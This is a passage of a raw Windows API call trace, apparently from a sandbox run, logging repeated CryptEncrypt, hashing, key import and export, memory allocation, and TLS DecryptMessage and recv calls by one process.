hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.801] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.801] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.801] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.801] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.801] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.801] malloc (_Size=0x1fd) returned 0x3def010 [0156.801] free (_Block=0x0) [0156.801] free (_Block=0x3d81e60) [0156.801] malloc (_Size=0x1fd) returned 0x3d81e60 [0156.801] free (_Block=0x0) [0156.801] CryptDuplicateHash (in: hHash=0x3e1a18, pdwReserved=0x0, dwFlags=0x0, phHash=0x339fb34 | out: phHash=0x339fb34) returned 1 [0156.801] CryptHashData (hHash=0x432778, pbData=0x3d81e60, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0156.802] malloc (_Size=0x14) returned 0x3f652c0 [0156.802] free (_Block=0x0) [0156.802] CryptGetHashParam (in: hHash=0x432778, dwParam=0x2, pbData=0x3f652c0, pdwDataLen=0x339faec, dwFlags=0x0 | out: pbData=0x3f652c0, pdwDataLen=0x339faec) returned 1 [0156.802] CryptHashData (hHash=0x3e1a18, pbData=0x3d81e60, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0156.802] free (_Block=0x3f652c0) [0156.802] CryptDestroyHash (hHash=0x432778) returned 1 [0156.802] free (_Block=0x3d81e60) [0156.802] free (_Block=0x606108) [0156.802] malloc (_Size=0x1fd) returned 0x606108 [0156.802] free (_Block=0x0) [0156.802] malloc (_Size=0x94) returned 0x36918f0 [0156.802] free (_Block=0x0) [0156.802] malloc (_Size=0x94) returned 0x3d81e60 [0156.802] free (_Block=0x0) [0156.803] free (_Block=0x0) [0156.803] free (_Block=0x36918f0) [0156.803] CryptImportKey (in: hProv=0x3e57b0, pbData=0x339f5d8, dwDataLen=0x190, hPubKey=0x0, dwFlags=0x1, phKey=0x339f5d4 | out: phKey=0x339f5d4*=0x432df8) returned 1 [0156.808] CryptExportKey (in: hKey=0x432df8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x339f23c, pdwDataLen=0x339f224 | out: pbData=0x339f23c*, pdwDataLen=0x339f224*=0x90) returned 1 [0156.808] CryptExportKey (in: hKey=0x432df8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x339f908, pdwDataLen=0x339f5cc | out: pbData=0x339f908*, pdwDataLen=0x339f5cc*=0x90) returned 1 [0156.808] malloc (_Size=0x80) returned 0x609ad8 [0156.808] free (_Block=0x0) [0156.808] CryptDestroyKey (hKey=0x432df8) returned 1 [0156.808] malloc (_Size=0x64) returned 0x60b460 [0156.808] free (_Block=0x0) [0156.808] malloc (_Size=0x80) returned 0x60a688 [0156.808] free (_Block=0x0) [0156.808] malloc (_Size=0xc0) returned 0x36918f0 [0156.808] free (_Block=0x60a688) [0156.808] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x339fa5c | out: phHash=0x339fa5c) returned 1 [0156.808] CryptHashData (hHash=0x432cf8, pbData=0x36918f0, dwDataLen=0x81, dwFlags=0x0) returned 1 [0156.809] malloc (_Size=0x14) returned 0x3f65280 [0156.809] free (_Block=0x0) [0156.809] CryptGetHashParam (in: hHash=0x432cf8, dwParam=0x2, pbData=0x3f65280, pdwDataLen=0x339fa54, dwFlags=0x0 | out: pbData=0x3f65280, pdwDataLen=0x339fa54) returned 1 [0156.809] CryptDestroyHash (hHash=0x432cf8) returned 1 [0156.809] free (_Block=0x3f65280) [0156.809] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x339fa5c | out: phHash=0x339fa5c) returned 1 [0156.809] CryptHashData (hHash=0x4328f8, pbData=0x36918f0, dwDataLen=0x81, dwFlags=0x0) returned 1 [0156.809] malloc (_Size=0x14) returned 0x3f65280 [0156.809] free (_Block=0x0) [0156.809] CryptGetHashParam (in: hHash=0x4328f8, dwParam=0x2, pbData=0x3f65280, pdwDataLen=0x339fa54, dwFlags=0x0 | out: pbData=0x3f65280, pdwDataLen=0x339fa54) returned 1 [0156.809] CryptDestroyHash (hHash=0x4328f8) returned 1 [0156.809] free (_Block=0x3f65280) [0156.809] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x339fa5c | out: phHash=0x339fa5c) returned 1 [0156.809] CryptHashData (hHash=0x432af8, pbData=0x36918f0, dwDataLen=0x81, dwFlags=0x0) returned 1 [0156.809] malloc (_Size=0x14) returned 0x3f653e0 [0156.810] free (_Block=0x0) [0156.810] CryptGetHashParam (in: hHash=0x432af8, dwParam=0x2, pbData=0x3f653e0, pdwDataLen=0x339fa54, dwFlags=0x0 | out: pbData=0x3f653e0, pdwDataLen=0x339fa54) returned 1 [0156.810] CryptDestroyHash (hHash=0x432af8) returned 1 [0156.810] free (_Block=0x3f653e0) [0156.810] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x339fa5c | out: phHash=0x339fa5c) returned 1 [0156.810] CryptHashData (hHash=0x4329f8, pbData=0x36918f0, dwDataLen=0x81, dwFlags=0x0) returned 1 [0156.810] malloc (_Size=0x14) returned 0x3f65280 [0156.810] free (_Block=0x0) [0156.810] CryptGetHashParam (in: hHash=0x4329f8, dwParam=0x2, pbData=0x3f65280, pdwDataLen=0x339fa54, dwFlags=0x0 | out: pbData=0x3f65280, pdwDataLen=0x339fa54) returned 1 [0156.810] CryptDestroyHash (hHash=0x4329f8) returned 1 [0156.810] free (_Block=0x3f65280) [0156.810] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x339fa5c | out: phHash=0x339fa5c) returned 1 [0156.811] CryptHashData (hHash=0x4327f8, pbData=0x36918f0, dwDataLen=0x81, dwFlags=0x0) returned 1 [0156.811] malloc (_Size=0x14) returned 0x3f65280 [0156.811] free (_Block=0x0) [0156.811] CryptGetHashParam (in: hHash=0x4327f8, dwParam=0x2, pbData=0x3f65280, pdwDataLen=0x339fa54, dwFlags=0x0 | out: pbData=0x3f65280, pdwDataLen=0x339fa54) returned 1 [0156.811] CryptDestroyHash (hHash=0x4327f8) returned 1 [0156.811] free (_Block=0x3f65280) [0156.811] free (_Block=0x36918f0) [0156.811] malloc (_Size=0x50) returned 0x3d9ac48 [0156.811] free (_Block=0x0) [0156.811] free (_Block=0x60b460) [0156.811] free (_Block=0x609ad8) [0156.811] malloc (_Size=0xb8) returned 0x36918f0 [0156.811] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x36919a0 | out: phHash=0x36919a0) returned 1 [0156.811] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x36919a4 | out: phHash=0x36919a4) returned 1 [0156.811] CryptHashData (hHash=0x432df8, pbData=0x339fa74, dwDataLen=0x14, dwFlags=0x0) returned 1 [0156.811] CryptHashData (hHash=0x432c78, pbData=0x339faf4, dwDataLen=0x14, dwFlags=0x0) returned 1 [0156.812] CryptImportKey (in: hProv=0x3cf450, pbData=0x339fa90, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x339fa8c | out: phKey=0x339fa8c*=0x432eb8) returned 1 [0156.812] CryptSetKeyParam (hKey=0x432eb8, dwParam=0x4, pbData=0x74199484*=0x2, dwFlags=0x0) returned 1 [0156.812] CryptImportKey (in: hProv=0x3cf450, pbData=0x339fa90, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x339fa8c | out: phKey=0x339fa8c*=0x432a38) returned 1 [0156.812] CryptSetKeyParam (hKey=0x432a38, dwParam=0x4, pbData=0x74199484*=0x2, dwFlags=0x0) returned 1 [0156.812] free (_Block=0x3d9ac48) [0156.812] SetEvent (hEvent=0x380) returned 1 [0156.812] free (_Block=0x3d81e60) [0156.812] free (_Block=0x606108) [0156.812] free (_Block=0x3def010) [0156.812] DecryptMessage (in: phContext=0x3594d4c, pMessage=0x339fb0c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x339fb0c, pfQOP=0x0) returned 0x80090318 [0156.812] recv (in: s=0x5c8, buf=0x3689268, len=16413, flags=0 | out: buf=0x3689268*) returned 543 [0157.139] DecryptMessage (in: phContext=0x3594d4c, pMessage=0x339fb0c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x339fb0c, pfQOP=0x0) returned 0x0 [0157.139] malloc (_Size=0x1fd) returned 0x606108 [0157.139] free (_Block=0x0) [0157.139] malloc (_Size=0x1fd) returned 0x3d81e60 [0157.139] free (_Block=0x0) [0157.139] free (_Block=0x0) [0157.139] free (_Block=0x606108) [0157.139] malloc (_Size=0x1fd) returned 0x606108 [0157.140] free (_Block=0x0) [0157.140] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.140] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.140] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.140] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.140] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.140] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.140] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.140] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.140] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.140] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.141] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.141] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.141] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.141] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.141] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.141] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.141] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.141] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.141] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.141] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.141] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.141] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.141] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.142] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.142] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.142] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.142] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.142] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.142] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.142] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.142] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.142] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.142] malloc (_Size=0x1fd) returned 0x3def010 [0157.142] free (_Block=0x0) [0157.142] free (_Block=0x3d81e60) [0157.142] free (_Block=0x606108) [0157.142] malloc (_Size=0x1fd) returned 0x606108 [0157.142] free (_Block=0x0) [0157.143] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.143] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.143] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.143] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.143] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.143] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.143] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.143] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.143] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.143] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.143] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.143] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.143] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.143] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.143] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.143] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.144] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.144] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.144] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.144] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.144] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.144] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.144] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.144] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.144] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.144] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.144] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.144] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.144] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.144] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.144] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.144] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.145] malloc (_Size=0x1fd) returned 0x3d81e60 [0157.145] free (_Block=0x0) [0157.145] free (_Block=0x3def010) [0157.145] malloc (_Size=0x1fd) returned 0x3def010 [0157.145] free (_Block=0x0) [0157.145] CryptDuplicateHash (in: hHash=0x432c78, pdwReserved=0x0, dwFlags=0x0, phHash=0x339fb34 | out: phHash=0x339fb34) returned 1 [0157.145] CryptHashData (hHash=0x4329f8, pbData=0x3def010, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0157.145] malloc (_Size=0x14) returned 0x3f65460 [0157.145] free (_Block=0x0) [0157.145] CryptGetHashParam (in: hHash=0x4329f8, dwParam=0x2, pbData=0x3f65460, pdwDataLen=0x339faec, dwFlags=0x0 | out: pbData=0x3f65460, pdwDataLen=0x339faec) returned 1 [0157.145] CryptHashData (hHash=0x432c78, pbData=0x3def010, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0157.145] free (_Block=0x3f65460) [0157.145] CryptDestroyHash (hHash=0x4329f8) returned 1 [0157.145] free (_Block=0x3def010) [0157.145] free (_Block=0x606108) [0157.145] malloc (_Size=0x1fd) returned 0x606108 [0157.146] free (_Block=0x0) [0157.146] free (_Block=0x0) [0157.146] free (_Block=0x0) [0157.146] SetEvent (hEvent=0x5d0) returned 1 [0157.146] SetEvent (hEvent=0x380) returned 1 [0157.146] free (_Block=0x0) [0157.146] free (_Block=0x606108) [0157.146] free (_Block=0x3d81e60) [0157.146] DecryptMessage (in: phContext=0x3594d4c, pMessage=0x339fb0c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x339fb0c, pfQOP=0x0) returned 0x80090318 [0157.146] recv (in: s=0x5c8, buf=0x3689268, len=16413, flags=0 | out: buf=0x3689268*) returned 3627 [0157.483] DecryptMessage (in: phContext=0x3594d4c, pMessage=0x339fb0c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x339fb0c, pfQOP=0x0) returned 0x0 [0157.483] malloc (_Size=0x1fd) returned 0x606108 [0157.483] free (_Block=0x0) [0157.483] malloc (_Size=0x1fd) returned 0x3d81e60 [0157.484] free (_Block=0x0) [0157.484] free (_Block=0x0) [0157.484] free (_Block=0x606108) [0157.484] malloc (_Size=0x1fd) returned 0x606108 [0157.484] free (_Block=0x0) [0157.484] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, 